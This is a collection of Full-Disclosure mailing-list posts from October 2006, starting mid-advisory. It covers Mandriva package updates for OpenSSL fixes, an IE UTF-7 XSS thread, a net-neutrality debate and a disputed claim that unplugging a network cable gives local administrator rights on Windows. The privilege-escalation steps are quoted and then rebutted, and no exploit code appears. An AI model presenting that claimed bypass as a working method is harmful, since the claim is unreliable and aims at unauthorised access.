441a806fc8a50f74f5b4bcfce1fc8f66 2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 54ed69fc4976d3c0953eeebd3c10471a 2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mdk.x86_64.rpm 632fbe5eaff684ec2f27da4bbe93c4f6 2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mdk.x86_64.rpm 04dbe52bda3051101db73fabe687bd7e 2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.x86_64.rpm 5e48a8d9a6a03a045b6d0d2b6903dc5b 2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm f86f3a2efd19ff5fb1600212cbd8e463 2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm 73b99c1a8a34fe3c2279c09c4f385804 2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm ca169246cc85db55839b265b90e8c842 2006.0/x86_64/openssl-0.9.7g-2.5.20060mdk.x86_64.rpm 441a806fc8a50f74f5b4bcfce1fc8f66 2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm Mandriva Linux 2007.0: db68f8f239604fb76a0a10c70104ef61 2007.0/i586/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm 26a4de823aee08e40d28ed7e6ff5b2ff 2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm ab949cf85296ceae864f83fbbac2b55a 2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm a97c6033a33fabcd5509568304b7a988 2007.0/i586/openssl-0.9.8b-2.2mdv2007.0.i586.rpm 78964615b7bd71028671257640be3bc5 2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 1895971ef1221056075c4ee3d4aaac72 2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.2mdv2007.0.x86_64.rpm cfd59201e5e9c436f42b969b4aa567f1 2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm 36da85c76eddf95feeb3f4b792528483 2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm db68f8f239604fb76a0a10c70104ef61 2007.0/x86_64/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm 26a4de823aee08e40d28ed7e6ff5b2ff 2007.0/x86_64/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm ab949cf85296ceae864f83fbbac2b55a 2007.0/x86_64/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm e3aebeae455a0820c5f28483bd6d3fa5 2007.0/x86_64/openssl-0.9.8b-2.2mdv2007.0.x86_64.rpm 78964615b7bd71028671257640be3bc5 2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm Corporate 3.0: 7f60837e42b45ce50f365ec1372d6aeb
[Full-disclosure] [ MDKSA-2006:177 ] - Updated MySQL packages rebuilt against updated openssl.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:177 http://www.mandriva.com/security/ ___ Package : MySQL Date: October 2, 2006 Affected: 2006.0, Corporate 3.0, Multi Network Firewall 2.0 ___ Problem Description: Openssl recently had several vulnerabilities which were patched (CVE-2006-2937,2940,3738,4339, 4343). Some MySQL versions are built against a static copy of the SSL libraries. As a precaution an updated copy built against the new libraries in being made available. ___ Updated Packages: Mandriva Linux 2006.0: 418e35dd59274a82fbbd30ad86ae4b52 2006.0/i586/libmysql14-4.1.12-4.10.20060mdk.i586.rpm c5f9cb360efec94d2697ed851ee176a2 2006.0/i586/libmysql14-devel-4.1.12-4.10.20060mdk.i586.rpm 910de5c23772bb3f26cdcdce8003d114 2006.0/i586/MySQL-4.1.12-4.10.20060mdk.i586.rpm abe1945164f6a636299eb1ae4bba1c78 2006.0/i586/MySQL-bench-4.1.12-4.10.20060mdk.i586.rpm 28b3e7d8c05df9b754f4cf945f30d428 2006.0/i586/MySQL-client-4.1.12-4.10.20060mdk.i586.rpm 675e9b54a946384c41f75fddbf1ae01f 2006.0/i586/MySQL-common-4.1.12-4.10.20060mdk.i586.rpm 1d4f0ae66414ce37aebfd3f4c1a83899 2006.0/i586/MySQL-Max-4.1.12-4.10.20060mdk.i586.rpm 22bda4fffb5fd0a4947e7b6504490221 2006.0/i586/MySQL-NDB-4.1.12-4.10.20060mdk.i586.rpm 65f2714658fbaa7194aa6a9e35bea114 2006.0/SRPMS/MySQL-4.1.12-4.10.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 6e7f0056a120f698eec53cb07638b4c7 2006.0/x86_64/lib64mysql14-4.1.12-4.10.20060mdk.x86_64.rpm b1ea5845d8148276d1a5d3c86a7812c7 2006.0/x86_64/lib64mysql14-devel-4.1.12-4.10.20060mdk.x86_64.rpm be05d787582cdffc9b501afec29d0d4a 2006.0/x86_64/MySQL-4.1.12-4.10.20060mdk.x86_64.rpm afef58f5bdbbc31174b7e4a38e6d3bea 2006.0/x86_64/MySQL-bench-4.1.12-4.10.20060mdk.x86_64.rpm 7df7c9d58ca919d0c2bfd8ec54df9f64 2006.0/x86_64/MySQL-client-4.1.12-4.10.20060mdk.x86_64.rpm 6f2adf900838a2daffc58c367356b5b9 2006.0/x86_64/MySQL-common-4.1.12-4.10.20060mdk.x86_64.rpm 4ae3e7c5ee1d2e808685fcf5ea1abbf6 2006.0/x86_64/MySQL-Max-4.1.12-4.10.20060mdk.x86_64.rpm adc04989620b1683064bceca1cc1f997 2006.0/x86_64/MySQL-NDB-4.1.12-4.10.20060mdk.x86_64.rpm 65f2714658fbaa7194aa6a9e35bea114 2006.0/SRPMS/MySQL-4.1.12-4.10.20060mdk.src.rpm Corporate 3.0: 323307ba6f7102132a1cb8443a75e66c corporate/3.0/i586/libmysql12-4.0.18-1.11.C30mdk.i586.rpm 49c8f4902afaceb40a5d02484b8698b0 corporate/3.0/i586/libmysql12-devel-4.0.18-1.11.C30mdk.i586.rpm b0610cd3eef31b8264c9d87f214ae974 corporate/3.0/i586/MySQL-4.0.18-1.11.C30mdk.i586.rpm 99122a2f538b7705392589376204ccb8 corporate/3.0/i586/MySQL-bench-4.0.18-1.11.C30mdk.i586.rpm ebfc7f7d062943f19fdc21e7b4a7c2d6 corporate/3.0/i586/MySQL-client-4.0.18-1.11.C30mdk.i586.rpm 7a57faae42e4291c023440d71c334694 corporate/3.0/i586/MySQL-common-4.0.18-1.11.C30mdk.i586.rpm 5b72f88050ce6ff4baf59050d4f1e105 corporate/3.0/i586/MySQL-Max-4.0.18-1.11.C30mdk.i586.rpm bace43f39e7de6cca61705269164ff26 corporate/3.0/SRPMS/MySQL-4.0.18-1.11.C30mdk.src.rpm Corporate 3.0/X86_64: 9b4551d3c2cbbd83f2d648281e281fb7 corporate/3.0/x86_64/lib64mysql12-4.0.18-1.11.C30mdk.x86_64.rpm 4bb8482468f2c5d8f949d3b70c18bec5 corporate/3.0/x86_64/lib64mysql12-devel-4.0.18-1.11.C30mdk.x86_64.rpm e840471dd81001b0bcf6eecb5fe15b7b corporate/3.0/x86_64/MySQL-4.0.18-1.11.C30mdk.x86_64.rpm 9de8c944a34e0a1245f076c59e8a116e corporate/3.0/x86_64/MySQL-bench-4.0.18-1.11.C30mdk.x86_64.rpm 2ad4b05e6082164ca3aaa0444b2a1560 corporate/3.0/x86_64/MySQL-client-4.0.18-1.11.C30mdk.x86_64.rpm a9a07403bf8c415d72ab28fd224cec31 corporate/3.0/x86_64/MySQL-common-4.0.18-1.11.C30mdk.x86_64.rpm bd267d5fe073af1ce9b36e18713f18db corporate/3.0/x86_64/MySQL-Max-4.0.18-1.11.C30mdk.x86_64.rpm bace43f39e7de6cca61705269164ff26 corporate/3.0/SRPMS/MySQL-4.0.18-1.11.C30mdk.src.rpm Multi Network Firewall 2.0: 6bfd646483d072e2b53f9eee29279f93 mnf/2.0/i586/libmysql12-4.0.18-1.11.M20mdk.i586.rpm dfaed993c2887c8ff6bae73d28bd8448 mnf/2.0/SRPMS/MySQL-4.0.18-1.11.M20mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com
Re: [Full-disclosure] Security Rss Feeds
crazy frog crazy frog wrote: Hi, Please share various security related rss feeds you read daily. Thanks, -CF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://feeds.feedburner.com/darknethackers is pretty useful too and hasn't been mentioned yet. I also subscribe to some general ones like Register Security feed, digg/security, cnet security. Cheers. -- Gareth Davies - ISO 27001 LA, OPST Manager - Security Practice Network Security Solutions MSC Sdn. Bhd. Suite E-07-21, Block E, Plaza Mont' Kiara, No. 2 Jalan Kiara, Mont’ Kiara, 50480 Kuala Lumpur, Malaysia Phone: +603-6203 5303 or +603-6203 5920 www.mynetsec.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
Brian Eaton [EMAIL PROTECTED] wrote: ... I just tested Apache 1.3.37 and Apache 2.2.3, and both specified a content-type header of text/html; charset=iso-8859-1 for 404 responses ... So, how default were your servers? On my own server (Debian package apache2-common version 2.0.54-5sarge1) I see in apache2.conf: IfModule mod_negotiation.c IfModule mod_include.c Alias /error/ /usr/share/apache2/error/ ... ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var ... /IfModule /IfModule but those modules are not mentioned in any LoadModule lines. The attack worked fine also against a certain HTTPS server of interest here at USyd. Would seem that if Apache is internationalized with those error messages than you are safe, but not if you kept things simple. The bug is not in Apache, but in IE. Why would all web servers need to specify some charset for each and every webpage... Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:178 ] - Updated ntp packages rebuilt against updated openssl.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:178 http://www.mandriva.com/security/ ___ Package : ntp Date: October 2, 2006 Affected: 2006.0, 2007.0, Corporate 4.0 ___ Problem Description: Openssl recently had several vulnerabilities which were patched (CVE-2006-2937,2940,3738,4339, 4343). Some versions of ntp are built against a static copy of the SSL libraries. As a precaution an updated copy built against the new libraries in being made available. ___ Updated Packages: Mandriva Linux 2006.0: 98c8d5fa78f53e234fbe25720dd7c64e 2006.0/i586/ntp-4.2.0-21.2.20060mdk.i586.rpm 690334db340a7418fd42f31f3ef0092b 2006.0/i586/ntp-client-4.2.0-21.2.20060mdk.i586.rpm 615821f6def15f16d1add3ef4db74584 2006.0/SRPMS/ntp-4.2.0-21.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 69b70d3b9c86494a072c1897a41c62a4 2006.0/x86_64/ntp-4.2.0-21.2.20060mdk.x86_64.rpm 55e6f0121357ff75a3963f779b83621f 2006.0/x86_64/ntp-client-4.2.0-21.2.20060mdk.x86_64.rpm 615821f6def15f16d1add3ef4db74584 2006.0/SRPMS/ntp-4.2.0-21.2.20060mdk.src.rpm Mandriva Linux 2007.0: 4b1e5dc60377ee51d9369269a82672b4 2007.0/i586/ntp-4.2.0-31.2mdv2007.0.i586.rpm 6a2eca6a384e49006d39a1d2af6eb4b4 2007.0/i586/ntp-client-4.2.0-31.2mdv2007.0.i586.rpm b3c8e254ab51edad15cec56a931873f4 2007.0/SRPMS/ntp-4.2.0-31.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 9a17e864f1d5d2b5b6990729ea94c371 2007.0/x86_64/ntp-4.2.0-31.2mdv2007.0.x86_64.rpm d267c0c5bfec9691572555e5147e459d 2007.0/x86_64/ntp-client-4.2.0-31.2mdv2007.0.x86_64.rpm b3c8e254ab51edad15cec56a931873f4 2007.0/SRPMS/ntp-4.2.0-31.2mdv2007.0.src.rpm Corporate 4.0: 90da334ac6d246c3b62c5ed9734f7047 corporate/4.0/i586/ntp-4.2.0-21.2.20060mlcs4.i586.rpm ba752440cb884a7451e1f3efc877c9d9 corporate/4.0/i586/ntp-client-4.2.0-21.2.20060mlcs4.i586.rpm 27f37e1e3d5ea1b4bd19cfb57a501659 corporate/4.0/SRPMS/ntp-4.2.0-21.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 19aaa620b9533f90f145b77ca6bddf2b corporate/4.0/x86_64/ntp-4.2.0-21.2.20060mlcs4.x86_64.rpm 0aeb37acab5364abb19fd6af5cc33f87 corporate/4.0/x86_64/ntp-client-4.2.0-21.2.20060mlcs4.x86_64.rpm 27f37e1e3d5ea1b4bd19cfb57a501659 corporate/4.0/SRPMS/ntp-4.2.0-21.2.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFIV//mqjQ0CJFipgRApEqAKDfrtPm9LmOw+FoQffcDyJ5TQ0UnwCdHole JlZ71gXVFcj6A7k9cyBnzI0= =T73Y -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Truths in Truth in Caller ID Act
You are 100 percent right about the US government. The US Constitution may protect US citizens from the government but nothing will protect them from the big telecom companies who will own them and their data unless we enact a new neutrality law in the US. Regards, Nancy Kramer Webmaster http://www.americandreamcars.com Free Color Picture Ads for Collector Cars One of the Ten Best Places To Buy or Sell a Collector Car on the Web At 04:48 PM 10/1/2006, Joe Barr wrote: On Sun, 2006-10-01 at 12:28 -0500, J. Oquendo wrote: So the United States government wants to pass the Truth in Caller ID act. Humorously it will do little do deter criminals from spoofing their caller ID and scamming innocent victims. Here is the rule/law followed by why it will fail: The U.S. government will do its duty, that is to say, they will lick the ass of the telecommunications industry lobbyists and do whatever they damn well say. -- It's a strange world when proprietary software is not worth stealing, but free software is. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.1.407 / Virus Database: 268.12.10/459 - Release Date: 9/29/2006 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.407 / Virus Database: 268.12.12/461 - Release Date: 10/2/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Truths in Truth in Caller ID Act
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yo Nancy! On Mon, 2 Oct 2006, Nancy Kramer wrote: the big telecom companies who will own them and their data unless we enact a new neutrality law in the US. Yeah, but guess who wrote the net neutrality laws being vaoted on now? RGDS GARY - --- Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 [EMAIL PROTECTED] Tel:+1(541)382-8588 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFFIcb68KZibdeR3qURAt21AKDYnZbDwH48cLuf8sGOrHyzxhXVIACgoCUY Z61iwKwZkShAyBJrIu66BuY= =NGtb -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Truths in Truth in Caller ID Act
I know it was the big telecoms. Been working for Net Neutrality to preserve it. Think they should just crap their telecom reform bill. Only helps the big telecoms. Do you know they want to do deep packet inspection on every packet to prioritize them. Going to be a huge security hole. I am neither a network engineer nor security engineer but deep packet inspection scares the crap out of me. Congress is clueless. They just want the campaign contributions of the big telecoms. I consider them owned by the telecoms in the hacker sense of owned. I am already seeing peering issues as the ISPs start to play with the new toys ie new Cisco Routers. Regards, Nancy Kramer Webmaster http://www.americandreamcars.com Free Color Picture Ads for Collector Cars One of the Ten Best Places To Buy or Sell a Collector Car on the Web At 10:12 PM 10/2/2006, Gary E. Miller wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yo Nancy! On Mon, 2 Oct 2006, Nancy Kramer wrote: the big telecom companies who will own them and their data unless we enact a new neutrality law in the US. Yeah, but guess who wrote the net neutrality laws being vaoted on now? RGDS GARY - --- Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 [EMAIL PROTECTED] Tel:+1(541)382-8588 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFFIcb68KZibdeR3qURAt21AKDYnZbDwH48cLuf8sGOrHyzxhXVIACgoCUY Z61iwKwZkShAyBJrIu66BuY= =NGtb -END PGP SIGNATURE- -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.1.407 / Virus Database: 268.12.12/461 - Release Date: 10/2/2006 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.407 / Virus Database: 268.12.12/461 - Release Date: 10/2/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
Seems that I was wrong and Brian Eaton [EMAIL PROTECTED] was right: default apache installations seem to return an explicit charset in their error message. (Now I cannot explain how I convinced myself otherwise.) Then there is no Universal XSS against default Apache webservers... Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Removing the NIC cable = EoP?
This seems to me to be more of a poor policy configuration. In Windows XP, the policy settings 'Local Policies/' 'Log on locally' and 'Deny logon locally' should prevent what this person is claiming (given proper policy settings). They did not identify a specific OS, but I assume it's XP. I haven't tried it, but that's my first impression. Hi list, recently I came across this link: http://evolvedlight.co.uk/?p=6 I searched around but didn't find anything more specific about this, kinda, EoP. Can someone actualy confirm this is working? Any informations would be much appreciated. Thank you. -E. http://www.email.si/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [SECURITY] [DSA 1185-2] New openssl packages fix arbitrary code execution
___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Removing the NIC cable = EoP?
This doesn't work on XP. Pulling the network cable *does not* cause the machine to default to local administrator. From the lame post: Login on the computer, and wait for the login window to disappear. Pull the network cable out of the wall. After about 30 seconds you will see the message that "could not retrieve local profile". It now loads up into the LOCAL administrator mode Think about this for just a second. Think about how Windows has worked with profiles since pretty much forever. The profile will be (unless configured otherwise) cached on the local machine. If configured to not be cached on the local machine you will either be given a default desktop (in luser land not local admin) and in some cases (older windows versions) you won't be allowed to login. So either the post is complete baloney or there is something badly misconfigured. On 10/2/06, Krainium [EMAIL PROTECTED] wrote: This seems to me to be more of a poor policy configuration.In WindowsXP, the policy settings 'Local Policies/' 'Log on locally' and 'Deny logon locally' should prevent what this person is claiming (given properpolicy settings).They did not identify a specific OS, but I assumeit's XP.I haven't tried it, but that's my first impression. Hi list, recently I came across this link: http://evolvedlight.co.uk/?p=6 I searched around but didn't find anything more specific about this, kinda, EoP. Can someone actualy confirm this is working? Any informations would be much appreciated. Thank you. -E. http://www.email.si/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
